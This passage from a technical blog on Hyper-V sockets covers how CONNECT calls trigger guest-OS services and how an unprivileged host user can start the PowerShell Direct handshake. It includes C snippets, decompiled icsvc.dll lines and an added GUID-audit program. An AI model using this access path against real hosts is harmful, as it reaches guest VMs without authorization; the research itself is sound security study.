<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Geolocation Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Microsoft Passport</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Portable Device Enumerator Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Sensor Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Sensor Monitoring Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Storage Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Touch Keyboard and Handwriting (probably)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And if we specify that GUID in the CONNECT call</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: "consolas"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{53f56307-b6bf-11d0-94f2-00a0c91efb8b}"</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &ServiceID); </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// when CONNECT is called with that GUID, the Portable Device Enumerator Service starts in the guest OS (even in a shielded VM)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the guest OS starts this service, because it believes that the triggering device has appeared in the system.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">One point: before doing this, the GUID must be added as a key under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\GuestCommunicationServices on the host OS (this needs local admin rights). </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="98" src="https://lh5.googleusercontent.com/Oz7Yy7H8L64s-CII-5MqPL4wWKCdHF-xlnXJWVa-v8-OErbrdanf7-zAsDEOO_r19WfBobwHJImvTRxgnrNzoGVrRd2kqHo1VL7IDcmuYtE5T0PpYIa5baPlLzblNgHu5M5-OLWg_KFjE9s3ig" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="259" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It works on a Shielded VM too (tested in Admin-Trusted mode), except for the Hyper-V Powershell Direct Service, which does not start.</span></div>
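<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As an added example (not the blog's code and not Microsoft's), the C program below does two things a defender checking this behaviour would want. First, it rebuilds the service GUID from the four little-endian dwords highlighted in the !dc dump above, which is how the bold bytes map to a registry-style GUID string. Second, it audits a constructed list of GuestCommunicationServices key names for GUIDs that collide with known device interface classes, the disk interface GUID from the CONNECT snippet among them, since such a key names a PnP trigger rather than a genuine Hyper-V socket service. The decoding, the sample key list and the function names are mine; the device interface GUIDs in the table are the standard Windows values, of which only the disk one appears on this page.</span></div>

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct { uint32_t data1; uint16_t data2, data3; uint8_t data4[8]; } guid_t;

/* Rebuild a GUID from four dwords exactly as `!dc` prints them: each dword is a
 * native little-endian integer, so Data1 is the first dword, Data2 and Data3 are
 * the low and high halves of the second, and Data4 is the byte sequence of the
 * last two dwords in memory order. */
guid_t guid_from_dc_dwords(uint32_t w0, uint32_t w1, uint32_t w2, uint32_t w3)
{
    guid_t g;
    g.data1 = w0;
    g.data2 = (uint16_t)(w1 & 0xffffu);
    g.data3 = (uint16_t)(w1 >> 16);
    for (int i = 0; i < 4; i++) {
        g.data4[i]     = (uint8_t)(w2 >> (8 * i));
        g.data4[4 + i] = (uint8_t)(w3 >> (8 * i));
    }
    return g;
}

/* Registry-style text form with braces; `out` must hold 39 bytes. */
void guid_to_string(const guid_t *g, char out[39])
{
    snprintf(out, 39, "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}",
             (unsigned)g->data1, (unsigned)g->data2, (unsigned)g->data3,
             g->data4[0], g->data4[1], g->data4[2], g->data4[3],
             g->data4[4], g->data4[5], g->data4[6], g->data4[7]);
}

/* Convenience: text form of a !dc dword quartet (static buffer, not reentrant). */
const char *dc_dwords_to_guid_text(uint32_t w0, uint32_t w1, uint32_t w2, uint32_t w3)
{
    static char text[39];
    guid_t g = guid_from_dc_dwords(w0, w1, w2, w3);
    guid_to_string(&g, text);
    return text;
}

static int hexval(char c)
{
    c = (char)tolower((unsigned char)c);
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return 10 + (c - 'a');
    return -1;
}

/* Parse "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", braces optional, any case.
 * Returns 1 on success, 0 if the text is not a well-formed GUID. */
int guid_parse(const char *s, guid_t *out)
{
    size_t len = strlen(s);
    if (len == 38 && s[0] == '{' && s[37] == '}') { s++; len = 36; }
    if (len != 36) return 0;
    uint8_t raw[16];                          /* the 16 bytes in text order */
    int n = 0;
    for (int i = 0; i < 36; i++) {
        if (i == 8 || i == 13 || i == 18 || i == 23) { if (s[i] != '-') return 0; continue; }
        int hi = hexval(s[i]), lo = hexval(s[i + 1]);
        if (hi < 0 || lo < 0) return 0;
        raw[n++] = (uint8_t)((hi << 4) | lo);
        i++;                                  /* two characters consumed */
    }
    out->data1 = ((uint32_t)raw[0] << 24) | ((uint32_t)raw[1] << 16) | ((uint32_t)raw[2] << 8) | raw[3];
    out->data2 = (uint16_t)((raw[4] << 8) | raw[5]);
    out->data3 = (uint16_t)((raw[6] << 8) | raw[7]);
    memcpy(out->data4, raw + 8, 8);
    return 1;
}

int guid_equal(const guid_t *a, const guid_t *b)
{
    return a->data1 == b->data1 && a->data2 == b->data2 && a->data3 == b->data3 &&
           memcmp(a->data4, b->data4, 8) == 0;
}

/* Standard Windows device interface classes (only the disk one is on this page). */
static const struct { const char *name, *guid; } k_device_interfaces[] = {
    { "GUID_DEVINTERFACE_DISK",   "{53f56307-b6bf-11d0-94f2-00a0c91efb8b}" },
    { "GUID_DEVINTERFACE_CDROM",  "{53f56308-b6bf-11d0-94f2-00a0c91efb8b}" },
    { "GUID_DEVINTERFACE_VOLUME", "{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}" },
    { "GUID_DEVINTERFACE_HID",    "{4d1e55b2-f16f-11cf-88cb-001111000030}" },
};

/* Count GuestCommunicationServices key names whose GUID is a device interface
 * class; `matched` (if non-NULL) receives the name of the first such interface. */
int audit_guest_services(const char *const *keys, size_t nkeys, const char **matched)
{
    int hits = 0;
    if (matched) *matched = NULL;
    for (size_t k = 0; k < nkeys; k++) {
        guid_t key, iface;
        if (!guid_parse(keys[k], &key)) continue;       /* non-GUID key names are skipped */
        for (size_t i = 0; i < sizeof k_device_interfaces / sizeof k_device_interfaces[0]; i++) {
            if (guid_parse(k_device_interfaces[i].guid, &iface) && guid_equal(&key, &iface)) {
                if (matched && !*matched) *matched = k_device_interfaces[i].name;
                hits++;
                break;
            }
        }
    }
    return hits;
}

/* Constructed sample of key names under ...\Virtualization\GuestCommunicationServices:
 * the service GUID decoded from the dump above and the disk GUID from the CONNECT snippet. */
const char *const sample_keys[] = {
    "999E53D4-3D5C-4C3E-8779-BED06EC056E1",
    "{53f56307-b6bf-11d0-94f2-00a0c91efb8b}",
};
const size_t sample_key_count = sizeof sample_keys / sizeof sample_keys[0];

int main(void)
{
    const char *hit = NULL;
    printf("GUID from the !dc dump: %s\n",
           dc_dwords_to_guid_text(0x999e53d4, 0x4c3e3d5c, 0xd0be7987, 0xe156c06e));
    int hits = audit_guest_services(sample_keys, sample_key_count, &hit);
    printf("%d key(s) collide with a device interface class (first: %s)\n", hits, hit ? hit : "none");
    return 0;
}
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Reading the bold dwords 999e53d4 4c3e3d5c d0be7987 e156c06e from the dump this way yields {999E53D4-3D5C-4C3E-8779-BED06EC056E1}, and the audit flags the disk interface key while leaving the session service key alone. On a real host the key list would come from enumerating the GuestCommunicationServices registry key rather than the constructed array used here.</span></div>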
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="194" src="https://lh4.googleusercontent.com/ICxvOdoe-DMPruEIZcv8OGZ2vcBTuTbwAu5QiFBDo9kgB5XIQTlKOVX7q7yUbu6z3rAlSDTDzqA1cfuTkQWIzjCMOALDVAIIPJmmBcXUDMvXopuzxsn12KYtennw6ZwLaSYjfCHI4JyX53XI0A" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="233" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It is very interesting to see the integration between Hyper-V sockets and the PnP subsystem in Windows.</span></div>
</div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-7594706141189972742017-06-17T01:54:00.002-07:002017-06-17T04:18:01.576-07:00Powershell Direct (few internals). Part 2 <div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" id="docs-internal-guid-3006072b-b541-4f4a-f4b3-1309405ca744" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">According to </span><a href="https://docs.microsoft.com/en-us/windows-server/virtualization/hyper-v/manage/manage-windows-virtual-machines-with-powershell-direct" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://docs.microsoft.com/en-us/windows-server/virtualization/hyper-v/manage/manage-windows-virtual-machines-with-powershell-direct</span></a><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, a PowerShell Direct session requires the Hyper-V Administrator privilege for the user who starts that session. That is true if you use the Enter-PSSession cmdlet, but if you use Hyper-V sockets natively you do not need any privileges for it.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinZYfV0iZks8tDd63qNgL5_HPKO361P1gpUtMsVKFwhHNPpie4Z8WoWnNmHgeFnqp-ul2q8wkgD7WxSYWgcRwmB-dqDn34bRO8wu2ncYskWqwmEAxCD7IdbmctGAUSnu7SJ5khYtV_Q0tW/s1600/%25D0%2591%25D0%25B5%25D0%25B7%25D1%258B%25D0%25BC%25D1%258F%25D0%25BD%25D0%25BD%25D1%258B%25D0%25B9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="482" data-original-width="1019" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinZYfV0iZks8tDd63qNgL5_HPKO361P1gpUtMsVKFwhHNPpie4Z8WoWnNmHgeFnqp-ul2q8wkgD7WxSYWgcRwmB-dqDn34bRO8wu2ncYskWqwmEAxCD7IdbmctGAUSnu7SJ5khYtV_Q0tW/s320/%25D0%2591%25D0%25B5%25D0%25B7%25D1%258B%25D0%25BC%25D1%258F%25D0%25BD%25D0%25BD%25D1%258B%25D0%25B9.png" width="320" /></a></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Log on to the Hyper-V host as a user without special privileges (a member of the local Users group only). Run an application that makes a CONNECT call to any guest VM running on that host (you can use the ClientExample app described earlier in this blog - </span><a href="https://github.com/gerhart01/HyperV-sockets" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/HyperV-sockets</span></a><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You need to change HV_PARENT_GUID to the GUID of the guest VM (VmID in the snippet below):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WSADATA</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> wsaData;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCKADDR_HV</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> clientService;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSID</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VmID, ServiceID;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// Initialize GUIDs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//wchar_t* clsid_str = L"{a42e7cda-d03f-480c-9cc2-a4de20abb878}"; // HV_PARENT_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">wchar_t</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">* clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{6a964317-1d87-4a74-abf9-46a69b048900}"</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &VmID);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{999e53d4-3d5c-4c3e-8779-bed06ec056e1}"</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &ServiceID); </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//GUID of Powershell Direct Service</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When you run it, you get a message from the guest OS:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="63" src="https://lh6.googleusercontent.com/p8hi4-rsxK57Z_2JK3NeMjKN4o7U4-p1vV9O5JltW_m4LMZoXR6V8H_0KdorgsEZUlkNtzQo2qAhgSOhaowdTTuCZ4MBHmgHCidvYY4CrJbds5ucpPUU9oOXlIVvhv6wV6NeVcUh3_EMPTqwEQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="177" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This is the start of the PoSh Direct communication protocol. The details can be seen in the OutOfProcTransportManager.cs and RemoteSessionHyperVSocket.cs files of the PowerShell source code and in the icsvc.dll library (the guest OS module that handles the communication at session start):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> if ( </span><span style="background-color: white; color: magenta; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">recv</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">i</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, (</span><span style="background-color: white; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">char *</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">v23</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 520, 0) == 0xFFFFFFFF</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> || </span><span style="background-color: white; color: magenta; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">send</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">i</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, "</span><span style="background-color: white; color: green; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PASS"</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 4, 0) == 0xFFFFFFFF</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> || </span><span style="background-color: white; color: magenta; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">recv</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">i</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, (</span><span style="background-color: white; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">char *</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&</span><span style="background-color: white; color: #8080ff; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">v22</span><span style="background-color: white; color: navy; font-family: "fixedsys"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 520, 0) == 0xFFFFFFFF</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
